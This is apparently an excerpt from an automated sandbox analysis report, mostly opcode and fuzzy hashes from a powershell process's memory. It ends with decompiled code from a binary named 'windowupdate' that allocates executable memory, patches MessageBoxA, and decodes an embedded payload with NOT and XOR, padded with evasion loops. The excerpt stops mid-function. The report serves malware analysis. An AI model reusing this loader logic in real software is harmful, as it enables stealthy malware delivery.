                      • Opcode Fuzzy Hash: 0b792a6d625310d69a6eff5c72b5f798df620638009a80636bb6c4f28a3616f7
                      • Instruction Fuzzy Hash: DC5147357082109FC71A9B39A8183BE3BE6EF85315B5909BBE50AC7382DF395C068791
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d88e25d1745d7248048019b9fd6acefb2589e363d73d5f566dc77b91ceebe918
                      • Instruction ID: f3a1a758ba3df975e47de4d2388e29f5ad86a988c53d1b603f59de7f9bde7c9a
                      • Opcode Fuzzy Hash: d88e25d1745d7248048019b9fd6acefb2589e363d73d5f566dc77b91ceebe918
                      • Instruction Fuzzy Hash: CE51ABB4A00204DFCB58EB78D845B5E7BF6EF8A302F64806DE105AB390DB369D05CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4813b869599e513dd0772d22c40a8dca2bd11e2be994c78aec215832a1259c48
                      • Instruction ID: c9a3e86135f5d905d171545dd326c6781463aa3df997f757f25a3fc358cb43f1
                      • Opcode Fuzzy Hash: 4813b869599e513dd0772d22c40a8dca2bd11e2be994c78aec215832a1259c48
                      • Instruction Fuzzy Hash: 12319E2120E3D05FC713AB68A8A48D67F71DF472A470E40D7D4C2CF1A3E6199C0AC3A2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 04cb95ddb15ebceb93b4be7fb96e034afb22cf4432b17eab78d6134b19410bac
                      • Instruction ID: aad9c4a3cf8cf5d23ac61bab0a29cc76ff548d451206403c89f87708c2080826
                      • Opcode Fuzzy Hash: 04cb95ddb15ebceb93b4be7fb96e034afb22cf4432b17eab78d6134b19410bac
                      • Instruction Fuzzy Hash: 58418B74A01204DFCB48EB78D845B5E7BF6EF8A302F64846DE105AB390DB369D05CB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.387584432.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_93d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 770f425bbb4b6586041c10fdb815b3708e697c8546b4c238b93a9c495f5fb62a
                      • Instruction ID: 3ee919c9775c352d4ee652c0d9c6a9f51d41136d2818fec832f791764716c9d8
                      • Opcode Fuzzy Hash: 770f425bbb4b6586041c10fdb815b3708e697c8546b4c238b93a9c495f5fb62a
                      • Instruction Fuzzy Hash: A421E271904200EFCF05CF50D9D8B26BB66FB88318F24C9B9E9054A256C33AD85ACF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 51aa461ca64d07b04bf13f5ddeb1c94edee50494f6e6216dedae288a2e5f773f
                      • Instruction ID: 9f0ab7ab9e56c1cdebe8f81b1da2994a467aac9a97920901fbab8e955facbd30
                      • Opcode Fuzzy Hash: 51aa461ca64d07b04bf13f5ddeb1c94edee50494f6e6216dedae288a2e5f773f
                      • Instruction Fuzzy Hash: EA212735704128AF8B289B79E8549AEB7F7EFD5350B15C02AE508D7344EB34DC058BE2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.387584432.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_93d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ac8f945872da32b69348b5b19e0c1b94e44f1839bdd85378d567612d2832c472
                      • Instruction ID: 501ee24144dfe8da0627447453fc77f230863036f5ede45abe226c0086e26e6d
                      • Opcode Fuzzy Hash: ac8f945872da32b69348b5b19e0c1b94e44f1839bdd85378d567612d2832c472
                      • Instruction Fuzzy Hash: C02125B0908240DFDB04CF14D4D4B26BB65FB84318F20C9B9D9494B297C37AD846CF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f74b88cfc695d16ff6f797c7d76c6429be5044310d53cb7a8f9c61447a74c39b
                      • Instruction ID: 274a2c6fe9bb5b54cdc92a6b12d4af97f112e5525e54ba7024e167b9c53855ca
                      • Opcode Fuzzy Hash: f74b88cfc695d16ff6f797c7d76c6429be5044310d53cb7a8f9c61447a74c39b
                      • Instruction Fuzzy Hash: 14216A71E00229CBDF19DFA4E8187EDBBB1EB48315F15003DD402B72A1CBB94940DBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c9e08e92ed8b88f818e813bdf19f3c35e53c95edb180bc27efdb93863da9fb29
                      • Instruction ID: c774baf85045af331921efc90d354e68cc0d87c3cdaf59f5b1acb850d5138acb
                      • Opcode Fuzzy Hash: c9e08e92ed8b88f818e813bdf19f3c35e53c95edb180bc27efdb93863da9fb29
                      • Instruction Fuzzy Hash: 101129353042105FC7155B39B9187AE7BEAFF89316B4108AEE41ACB681DF399D06C7A1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.387584432.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_93d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7373f3b095079c8085fc5391b305a90cc324b305bea087d039aac7e035de49d1
                      • Instruction ID: f519546da8986d1ad4fdd7d8e0299aa8f681535bdb7bd24388c03e06de8c2527
                      • Opcode Fuzzy Hash: 7373f3b095079c8085fc5391b305a90cc324b305bea087d039aac7e035de49d1
                      • Instruction Fuzzy Hash: 6F216A76904240DFCB06CF50D9D8B16BF62FB88314F24C6A9D9094A266C33AD86ACF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c533bc0654809387b6e00442933ee7f947bc410a8e87e02bbe5c14ef69eb7e82
                      • Instruction ID: 2e00329a426ce175a38ed3f54b3e32529931394c4a92924fc50daf0048109a44
                      • Opcode Fuzzy Hash: c533bc0654809387b6e00442933ee7f947bc410a8e87e02bbe5c14ef69eb7e82
                      • Instruction Fuzzy Hash: DA118E75A10514CFC714AF68D494ADDBBB1EF8C311F108059D505AB3A1CB716C41CFE4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eb6393cad0b0a1616fffe9b7c78633d75f70a42440226cf11406f26835b6dbdc
                      • Instruction ID: 5478e681d336a01c3589deb5d88b63f16f83caab3b48e7eea244856ac3218689
                      • Opcode Fuzzy Hash: eb6393cad0b0a1616fffe9b7c78633d75f70a42440226cf11406f26835b6dbdc
                      • Instruction Fuzzy Hash: D7110231A042558BDB1A8BA4E8283EEBFB1AF49320F18047ED401B76A1CB794D40DB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cbf741fdf7ca0af167c12f31edd912f70578a92f05dc68720ea179693120aa1a
                      • Instruction ID: a9576c12366b37b41b1bad04fc2a0cbf3fa46473b459c3a8a6c3470a23d59cb6
                      • Opcode Fuzzy Hash: cbf741fdf7ca0af167c12f31edd912f70578a92f05dc68720ea179693120aa1a
                      • Instruction Fuzzy Hash: A011E571B00115AFCB24CF69D8409EFBBB7EFA5390B14812AE814D7251E7359D05CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.387584432.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_93d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a8d995bed1e56ecd4f83b4dd5f006ecb01a09a897dda4f968aa4054b4fb86a75
                      • Instruction ID: 522ee47d3e4ae1676735b99c7c4ecf8c6e750a0a0fbee698989e24bc85cb9617
                      • Opcode Fuzzy Hash: a8d995bed1e56ecd4f83b4dd5f006ecb01a09a897dda4f968aa4054b4fb86a75
                      • Instruction Fuzzy Hash: 4C119D75908280DFCB15CF14D5D4B25BFA2FB84314F28C6AAD8494B697C33AD85ACF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4244070acb7c6d8bc45cae4008508c0f21b6af33f934e066acd8f3fd4648f2f0
                      • Instruction ID: d586409bbec8e5b80a687c89f635642f7b21b317bf75fa5fb7329f16a4ab6946
                      • Opcode Fuzzy Hash: 4244070acb7c6d8bc45cae4008508c0f21b6af33f934e066acd8f3fd4648f2f0
                      • Instruction Fuzzy Hash: 57115A71A50114DFCB14DF68D498A9EBBB6EF88311F148069E906AB3A1CB75AC04CFA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 85282da57b83c6f7551d4cfbeb6b202d18cf21f05806cbc496e5128bcb76d3a5
                      • Instruction ID: 5d0434fd7fb8c7f31153ea0be904473900969fab5c4766d5964341ee59e2dcd1
                      • Opcode Fuzzy Hash: 85282da57b83c6f7551d4cfbeb6b202d18cf21f05806cbc496e5128bcb76d3a5
                      • Instruction Fuzzy Hash: BDF02232208319ABDF11CDA0AC00DFB3B69EB85320F058096FA44D6121C72ACD21EBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.387584432.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_93d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f0f44a53ea4536931a2bf3b94eef54485e7e095449fd17372b5b10b088f8a588
                      • Instruction ID: f67d98143aedcfd104f9361b793e1709dd2520538ddac1ea7297c02a8dbefbb7
                      • Opcode Fuzzy Hash: f0f44a53ea4536931a2bf3b94eef54485e7e095449fd17372b5b10b088f8a588
                      • Instruction Fuzzy Hash: 93017B704093809AD7144E25EC84B67FFDCEF41B24F088809ED045B282C3789D05CFB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.387584432.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_93d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 864cc0974f5c6e56efc674e9a2b23743ecf52aa9516bf6b8e6b190469be78cd3
                      • Instruction ID: 29a207820cf6516b396cf4ec882de8c30582055cb630be0f71cfbd9f75fe3fdc
                      • Opcode Fuzzy Hash: 864cc0974f5c6e56efc674e9a2b23743ecf52aa9516bf6b8e6b190469be78cd3
                      • Instruction Fuzzy Hash: 2B01296140E3C05ED7168B259CA4B52BFB8AF53624F0D81DBD9848F2A3C2699849CB72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2ae2d9e0f988222cc77181306fddbcce15c709db79eb79ad13171cf7ddaf8aa6
                      • Instruction ID: 2c9916b2e9adb7582c3f65303710f207ed4f5a87bf79ec4a61fe5b9f37e926e2
                      • Opcode Fuzzy Hash: 2ae2d9e0f988222cc77181306fddbcce15c709db79eb79ad13171cf7ddaf8aa6
                      • Instruction Fuzzy Hash: 22F0F632318034DBCB295A39B84427E31869FC9791F858436F706C7340E92DC94296D6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 616a0ce1feeaf2ab2ca8f110ccfcbb174925fb1f1d480544939de1ef2bff516e
                      • Instruction ID: 94044e7860305e59a14b69f6dc4cd14d4eb9a9f4d151d3f2fd0e0b1aeb7aa2d0
                      • Opcode Fuzzy Hash: 616a0ce1feeaf2ab2ca8f110ccfcbb174925fb1f1d480544939de1ef2bff516e
                      • Instruction Fuzzy Hash: B2F0F6757046207B9B28D6AAA850E6BF7DBEFC92A0704C03AE508CB740FA35EC0143A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 120319a71513a3f74d0a83cb728d06c914fad78384f146a03a6fe423de22ad3e
                      • Instruction ID: 7ed2fd8fbbeb804ed27e35529f3a436f0895ca85973cda6bc9624b586e19a4d7
                      • Opcode Fuzzy Hash: 120319a71513a3f74d0a83cb728d06c914fad78384f146a03a6fe423de22ad3e
                      • Instruction Fuzzy Hash: 16F02B3530031457D7546929E880BBBB7DAEFD4754F14883AE6058B6C0DEB9FC0883E6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ac7aa099127064299905250b465ec5897978793e9dbbda99093c69d0a5cefa36
                      • Instruction ID: 2375a50cdb89db50b153663c71f964c1a5002ca347c685ddaf15c1580d91e414
                      • Opcode Fuzzy Hash: ac7aa099127064299905250b465ec5897978793e9dbbda99093c69d0a5cefa36
                      • Instruction Fuzzy Hash: F801D135B042258BCB28A764D9257BF76B2AB88304F45443DD006FB780CF785D029BE6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c013847490f0c82f3b4824d57f3577436b488651253ee38e1bbc02824a7247bb
                      • Instruction ID: 9eec18a6481dbc7a75099f6c14a0ee792bd15f9227689f9de46d764e9786b6c5
                      • Opcode Fuzzy Hash: c013847490f0c82f3b4824d57f3577436b488651253ee38e1bbc02824a7247bb
                      • Instruction Fuzzy Hash: BAF03C71A01728DFDF94CF64E9807ADB7F2BB44354F1091AAE408A3250DB749999CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.386217098.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_720000_powershell.jbxd

                      Execution Graph

                      Execution Coverage:1.3%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:0%
                      Total number of Nodes:328
                      Total number of Limit Nodes:14

                      Control-flow Graph

                      control_flow_graph 468 d48c70-d48c7f SetUnhandledExceptionFilter
                      C-Code - Quality: 100%
                      			E00D48C70() {
                      				_Unknown_base(*)()* _t1;
                      
                      				_t1 = SetUnhandledExceptionFilter(E00D48C90); // executed
                      				return _t1;
                      			}





                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(00D48C90,?,00D484F8), ref: 00D48C78
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 1ed0977071c75beb034760e5be8a6aeb068f874174559e26067bb989131f366a
                      • Instruction ID: 5d52e1a469870276197a60cfecfad1a2793e1b2390b74a1f67df1a9f66e3e4bf
                      • Opcode Fuzzy Hash: 1ed0977071c75beb034760e5be8a6aeb068f874174559e26067bb989131f366a
                      • Instruction Fuzzy Hash: BAA0223008030EBF0A0033C2BC0AC0C3B0CE008AA33080080F20C802028E82A00000B2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 80%
                      			E00DBF830(void* __ebx, void* __edi, void* __esi) {
                      				signed int _v8;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				char _v33;
                      				char _v34;
                      				char _v35;
                      				char _v36;
                      				char _v37;
                      				char _v38;
                      				char _v39;
                      				char _v40;
                      				char _v41;
                      				char _v42;
                      				char _v43;
                      				char _v44;
                      				char _v45;
                      				char _v46;
                      				char _v47;
                      				char _v48;
                      				char _v49;
                      				char _v50;
                      				char _v51;
                      				char _v52;
                      				char _v53;
                      				char _v54;
                      				char _v55;
                      				char _v56;
                      				char _v57;
                      				char _v58;
                      				char _v59;
                      				char _v60;
                      				char _v61;
                      				char _v62;
                      				char _v63;
                      				char _v64;
                      				char _v65;
                      				char _v66;
                      				char _v67;
                      				char _v68;
                      				char _v69;
                      				char _v70;
                      				char _v71;
                      				char _v72;
                      				char _v73;
                      				char _v74;
                      				char _v75;
                      				char _v76;
                      				char _v77;
                      				char _v78;
                      				char _v79;
                      				char _v80;
                      				char _v81;
                      				char _v82;
                      				char _v83;
                      				char _v84;
                      				char _v85;
                      				char _v86;
                      				char _v87;
                      				char _v88;
                      				char _v89;
                      				char _v90;
                      				char _v91;
                      				char _v92;
                      				char _v93;
                      				char _v94;
                      				char _v95;
                      				char _v96;
                      				char _v97;
                      				char _v98;
                      				char _v99;
                      				char _v100;
                      				char _v101;
                      				char _v102;
                      				char _v103;
                      				char _v104;
                      				char _v105;
                      				char _v106;
                      				char _v107;
                      				char _v108;
                      				char _v109;
                      				char _v110;
                      				char _v111;
                      				char _v112;
                      				char _v113;
                      				char _v114;
                      				char _v115;
                      				char _v116;
                      				char _v117;
                      				char _v118;
                      				char _v119;
                      				char _v120;
                      				char _v121;
                      				char _v122;
                      				char _v123;
                      				char _v124;
                      				char _v125;
                      				char _v126;
                      				char _v127;
                      				char _v128;
                      				char _v129;
                      				char _v130;
                      				char _v131;
                      				char _v132;
                      				intOrPtr _v140;
                      				long _v148;
                      				void* _v156;
                      				struct HWND__* _v160;
                      				signed int _v164;
                      				struct HWND__* _v168;
                      				intOrPtr _v172;
                      				signed int _v176;
                      				struct HWND__* _v180;
                      				signed int _v184;
                      				signed int _v188;
                      				char _v192;
                      				signed int _t208;
                      				void* _t210;
                      				int _t213;
                      				void* _t239;
                      				void* _t243;
                      				void* _t244;
                      				int _t247;
                      				int _t251;
                      				int _t255;
                      				int _t256;
                      				int _t259;
                      				void* _t266;
                      				char _t323;
                      				void* _t325;
                      				int _t328;
                      				int _t332;
                      				void* _t336;
                      				void* _t337;
                      				signed int _t346;
                      				void* _t347;
                      				void* _t348;
                      
                      				_t266 = __ebx;
                      				_t336 =  &_v192;
                      				memset(_t336, 0xcccccccc, 0x2f << 2);
                      				_t348 = _t347 + 0xc;
                      				_t337 = _t336 + 0x2f;
                      				_t208 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t208 ^ _t346;
                      				_v24 = 0xdf6998;
                      				_v28 = 0x3e800;
                      				_v132 = 0xa8;
                      				_v131 = 0xc1;
                      				_v130 = 0xd3;
                      				_v129 = 0x97;
                      				_v128 = 0x13;
                      				_v127 = 0xba;
                      				_v126 = 0x79;
                      				_v125 = 0x46;
                      				_v124 = 0x9d;
                      				_v123 = 0x64;
                      				_v122 = 0x3a;
                      				_v121 = 0xae;
                      				_v120 = 0x23;
                      				_v119 = 0x90;
                      				_v118 = 0xb5;
                      				_v117 = 0xfc;
                      				_v116 = 0x83;
                      				_v115 = 0x78;
                      				_v114 = 0x2b;
                      				_v113 = 0x4c;
                      				_v112 = 0xac;
                      				_v111 = 0xa2;
                      				_v110 = 0x16;
                      				_v109 = 0xa;
                      				_v108 = 0x76;
                      				_v107 = 0xa6;
                      				_v106 = 0x54;
                      				_v105 = 0xd3;
                      				_v104 = 0xbe;
                      				_v103 = 0xcc;
                      				_v102 = 0x92;
                      				_v101 = 0x26;
                      				_v100 = 0x94;
                      				_v99 = 9;
                      				_v98 = 0x69;
                      				_v97 = 0xb1;
                      				_v96 = 0xfb;
                      				_v95 = 0x13;
                      				_v94 = 0xdc;
                      				_v93 = 0xb2;
                      				_v92 = 0x68;
                      				_v91 = 0x9a;
                      				_v90 = 0xe4;
                      				_v89 = 0x21;
                      				_v88 = 0x20;
                      				_v87 = 0x4c;
                      				_v86 = 0x88;
                      				_v85 = 0x43;
                      				_v84 = 0x8d;
                      				_v83 = 0xe;
                      				_v82 = 0x36;
                      				_v81 = 0x6b;
                      				_v80 = 0x79;
                      				_v79 = 0xd9;
                      				_v78 = 0xd1;
                      				_v77 = 0x58;
                      				_v76 = 0x44;
                      				_v75 = 0x4d;
                      				_v74 = 0xf6;
                      				_v73 = 0x52;
                      				_v72 = 0x14;
                      				_v71 = 0x6e;
                      				_v70 = 0x8a;
                      				_v69 = 0xd5;
                      				_v68 = 0x1b;
                      				_v67 = 0xff;
                      				_v66 = 0x3c;
                      				_v65 = 0x1c;
                      				_v64 = 0xd1;
                      				_v63 = 0xfb;
                      				_v62 = 0x91;
                      				_v61 = 0x58;
                      				_v60 = 0x30;
                      				_v59 = 0x57;
                      				_v58 = 4;
                      				_v57 = 0x8f;
                      				_v56 = 0x32;
                      				_v55 = 0xd8;
                      				_v54 = 0xe9;
                      				_v53 = 0xcd;
                      				_v52 = 0x46;
                      				_v51 = 0x90;
                      				_v50 = 0xee;
                      				_v49 = 0x94;
                      				_v48 = 0x63;
                      				_v47 = 0xbb;
                      				_v46 = 0xa;
                      				_v45 = 0xc0;
                      				_v44 = 0x9a;
                      				_v43 = 0x50;
                      				_v42 = 0xf1;
                      				_v41 = 0xa9;
                      				_v40 = 0xa9;
                      				_v39 = 0xb0;
                      				_v38 = 0x69;
                      				_v37 = 0x1d;
                      				_v36 = 0x85;
                      				_v35 = 4;
                      				_v34 = 0x58;
                      				_v33 = 0x9d;
                      				_t210 = VirtualAlloc(0, 0xa00000, 0x3000, 0x40); // executed
                      				_v140 = E00DC1520(_t210, _t348 - _t348);
                      				_v148 = 0;
                      				_v156 = MessageBoxA;
                      				_t213 = VirtualProtect(_v156, 0x100, 0x40,  &_v148); // executed
                      				E00DC1520(_t213, _t348 - _t348);
                      				 *((char*)(_t346 + 0xfffffffffffffff4)) =  *_v156;
                      				 *((char*)(_t346 + 0xbadba1)) =  *((intOrPtr*)(_v156 + (1 << 0)));
                      				 *((char*)(_t346 + 0xbadba1)) =  *((intOrPtr*)(_v156 + (1 << 1)));
                      				 *((char*)(_t346 + 0xfffffffffffffff7)) =  *((intOrPtr*)(_v156 + 3));
                      				 *_v156 = 0xc2;
                      				 *((char*)(_v156 + (1 << 0))) = 0x10;
                      				 *((char*)(_v156 + (1 << 1))) = 0;
                      				 *((char*)(_v156 + 3)) = 0x90;
                      				_v160 = 0;
                      				while(_v160 <= _v28 - 1) {
                      					_v164 =  !( *(_v24 + (_v28 - 1 - _v160) * 4));
                      					if(_v164 != 0) {
                      						 *((char*)(_v140 + _v160)) = _v164;
                      					}
                      					_v160 =  &(_v160->i);
                      				}
                      				_v168 = 0;
                      				while(1) {
                      					__eflags = _v168 - 0xeac40;
                      					if(_v168 >= 0xeac40) {
                      						break;
                      					}
                      					_v180 = 0;
                      					while(1) {
                      						__eflags = _v180 - 0x3ff;
                      						if(_v180 >= 0x3ff) {
                      							break;
                      						}
                      						_t256 = MessageBoxA(0, "1", "1", 1);
                      						__eflags = _t348 - _t348;
                      						E00DC1520(_t256, _t348 - _t348);
                      						_v172 = _v28;
                      						__eflags = _v28 - 0x1f9;
                      						if(_v28 >= 0x1f9) {
                      							_v176 = 0x64;
                      						} else {
                      							_t259 = MessageBoxA(0, "1", "1", 1);
                      							__eflags = _t348 - _t348;
                      							E00DC1520(_t259, _t348 - _t348);
                      							_v176 = 0;
                      						}
                      						_t332 =  &(_v180->i);
                      						__eflags = _t332;
                      						_v180 = _t332;
                      					}
                      					_v168 =  &(_v168->i);
                      				}
                      				_v184 = 0;
                      				while(1) {
                      					__eflags = _v184 - _v172;
                      					if(_v184 >= _v172) {
                      						break;
                      					}
                      					_t247 = MessageBoxA(0, "1", "1", 1);
                      					__eflags = _t348 - _t348;
                      					E00DC1520(_t247, _t348 - _t348);
                      					asm("cdq");
                      					_v188 = _v184 % _v176;
                      					__eflags = _v184 - 0x1000000;
                      					if(_v184 != 0x1000000) {
                      						_t255 = _v140 + _v184;
                      						__eflags = _t255;
                      						 *_t255 =  *(_v140 + _v184) ^  *(_t346 + _v188 - 0x80);
                      					}
                      					_t251 = MessageBoxA(0, "1", "1", 2);
                      					__eflags = _t348 - _t348;
                      					E00DC1520(_t251, _t348 - _t348);
                      					_t328 = _v184 + 1;
                      					__eflags = _t328;
                      					_v184 = _t328;
                      				}
                      				_v192 = _v140;
